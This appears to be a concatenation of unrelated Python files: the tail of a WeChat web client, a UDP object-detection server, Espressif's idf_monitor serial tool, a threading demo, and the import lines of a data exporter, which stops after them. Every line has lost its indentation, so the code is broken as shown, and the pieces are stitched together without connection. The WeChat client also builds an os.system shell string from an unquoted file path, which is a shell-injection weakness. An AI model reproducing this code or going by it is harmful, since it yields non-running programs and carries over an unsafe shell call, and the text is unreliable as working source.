text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
mat = qr.get_matrix()
self._printQR(mat) # qr.print_tty() or qr.print_ascii()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
udp_testing.py | import threading
import time
from multiprocessing import Pool, Process, Queue
from socketserver import DatagramRequestHandler, ThreadingUDPServer
import numpy as np
import object_detector
import ujson
from object_detector import PARTITION_NAME
from preprocessor import Preprocessor
from utils.network_utils import (RequestType, generateErrorMsg,
generateResponse, generateResultMsg)
###
# Helper Functions for ensemble methods.
# Not currently used, but may be useful for other things, so retained
###
def reject_outliers(data, m=2):
return data[abs(data - np.mean(data)) < m * np.std(data)]
def count_unique(keys):
uniq_keys = np.unique(keys)
bins = uniq_keys.searchsorted(keys)
return uniq_keys, np.bincount(bins)
###
# End Helper Functions
###
controlPort = 9998
dataList = []
numRECV = 0
numSlices = -1
inputShape = (1, 9216)
mobileProcTime = 0
transmitStartTime = 0
endToEndStartTime = 0
DTYPE = "JACKSON"
ServerAddress = ('', controlPort)
def postProcess(socket, address, port, output_queue):
'''Post Processor for handling returning the data to the client from the server.'''
print("postProcessor Started")
while True:
#Get the result of the classification from the pipeline, this line will block until a new result is available.
results = output_queue.get()
#Stop the server processing timer.
stopTime = time.time()
#store this stop time in the results packet.
results.stopServerProcTimer(stopTime)
#generate the result message and send it to the client.
socket.sendto(generateResultMsg(results),(address, port))
print("sent")
# Subclass the DatagramRequestHandler
class ControlMixin(object):
'''Defines the control methods for the threads within the UDP server.'''
def __init__(self, handler, poll_interval):
'''Executed when the threads are instantiated. Performs boilerplate setup.'''
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
def start(self):
'''Called when the start method is called. Instantiates a thread that will run the serve forever method of the server and daemonizes that thread.'''
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
# print("server running")
def stop(self):
'''Boilerplate shutdown method'''
self.shutdown()
self._thread.join()
self._thread = None
class EasyUDPServer(ControlMixin, ThreadingUDPServer):
'''Class for handling UDP Requests to the server. When a Request is received, the handle() method of MyUDPRequestHandler is called.'''
def __init__(self, input_queue, output_queue, addr, handler, poll_interval=0.001, bind_and_activate=True):
'''Called when the class is instantiated. Sets up the processing pipeline and defines the class for handling UDP Requests.'''
self.input_queue = input_queue
self.output_queue = output_queue
class MyUDPRequestHandler(DatagramRequestHandler):
'''Class that defines how the server handles incoming requests.'''
def __init__(self, request, client_address, server):
'''Called when the handler is instantiated. Passes the processing pipeline from the server to the handler.'''
self.input_queue = server.input_queue
self.output_queue = server.output_queue
self.inputShape = server.inputShape
#calls the superclass initialize() method.
DatagramRequestHandler.__init__(self, request, client_address, server)
def handle(self):
'''Method for actually handling an incoming request. Based on the request type, we either setup the session or pass data to the preprocessor for classification.'''
# the data we want is the first element of the request, and we want to get rid of all the line endings (e.g., \r\n, \n)
data = self.request[0].strip()
# the socket object that the client sent from is the second element of the request.
socket = self.request[1]
# the message is received in the json format, so we unpack it into a set of key:value pairs, or a dictionary.
msgParts = ujson.loads(data)
#We match the request type of the message to the dictionary of possible request types.
reqType = RequestType[msgParts['MessageType']]
# then condition on the request type.
if reqType == RequestType.HELLO:
#if the request is a "Hello" message, we need to let the client know we are here, so we echo the request
print("HELLO Recv'd")
#generate a response message from
resp = generateResponse(reqType, PARTITION_NAME)
socket.sendto(resp, (self.client_address[0],controlPort))
elif reqType == RequestType.SETUP:
print("SETUP Recv'd")
input_queue.put(msgParts)
resp = generateResponse(reqType, PARTITION_NAME)
socket.sendto(resp, (self.client_address[0], controlPort)) #Respond to setup request
postProcessor = Process(target=postProcess, args = (socket,self.client_address[0], controlPort,output_queue))
postProcessor.start()
elif reqType == RequestType.DATA_HEADER:
numPictures = msgParts['NumPictures']
input_queue.put(msgParts)
elif reqType == RequestType.DATA:
input_queue.put(msgParts)
elif reqType == RequestType.GOODBYE:
print(">>disconnect request recv'd")
results = generateResponse(reqType, PARTITION_NAME)
socket.sendto(results, (self.client_address[0], controlPort))
else:
print("unknown request type!")
ThreadingUDPServer.__init__(self, addr, MyUDPRequestHandler, bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def setPartitionPt(self, partitionName, partitionDict):
if partitionName in partitionDict.keys():
self.inputShape = tuple(partitionDict[partitionName])
print("Partition Point set to layer " + partitionName + " with shape " + str(self.inputShape))
else:
print("oops")
print(partitionDict)
def main():
#Setup the queues for the process communication between the Network Handler, Preprocessor, and Classifier
preprocessor_input_q = Queue()
preprocessor_output_q = Queue()
classifier_output_q = Queue()
object_detector.readPartitionData()
udpserver = EasyUDPServer(preprocessor_input_q, classifier_output_q, ServerAddress, 0.01)
udpserver.setPartitionPt(PARTITION_NAME, object_detector.partitions_dict)
udpserver.start()
try:
preprocessor = Preprocessor(preprocessor_input_q,preprocessor_output_q, udpserver.inputShape)
preprocessor_pool = Pool(1,preprocessor.run)
classifier_pool = Pool(1, object_detector.worker, (preprocessor_output_q, classifier_output_q))
udpserver.serve_forever()
except KeyboardInterrupt:
preprocessor_pool.terminate()
classifier_pool.terminate()
preprocessor_pool.join()
classifier_pool.join()
print("exiting")
if __name__ == '__main__':
main()
|
idf_monitor.py | #!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class LineMatcher:
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True;
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P) )
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A) ))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [ target ]
else:
popen_args = [ self.make, target ]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
yellow_print(translation.decode())
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
mtsleepC.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/10 3:39 PM
import threading
from time import sleep, ctime
loops = [4,2]
def loop(nloop, nsec):
print 'start loop', nloop, 'at:', ctime()
sleep(nsec)
print 'loop', nloop, 'done at:', ctime()
def main():
print 'starting at:', ctime()
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=loop, args=(i, loops[i]))
threads.append(t)
for i in nloops: # start threads
threads[i].start()
for i in nloops: # wait for all
threads[i].join() # threads to finish
print 'all DONE at:', ctime()
if __name__ == '__main__':
main() |
base_exporter.py | import datetime
import traceback
from collections import OrderedDict
from contextlib import closing
from exporters.default_retries import disable_retries
from exporters.exporter_config import ExporterConfig
from exporters.logger.base_logger import ExportManagerLogger
from exporters.meta import ExportMeta
from exporters.module_loader import ModuleLoader
from exporters.notifications.notifiers_list import NotifiersList
from exporters.notifications.receiver_groups import CLIENTS, TEAM
from exporters.writers.base_writer import ItemsLimitReached
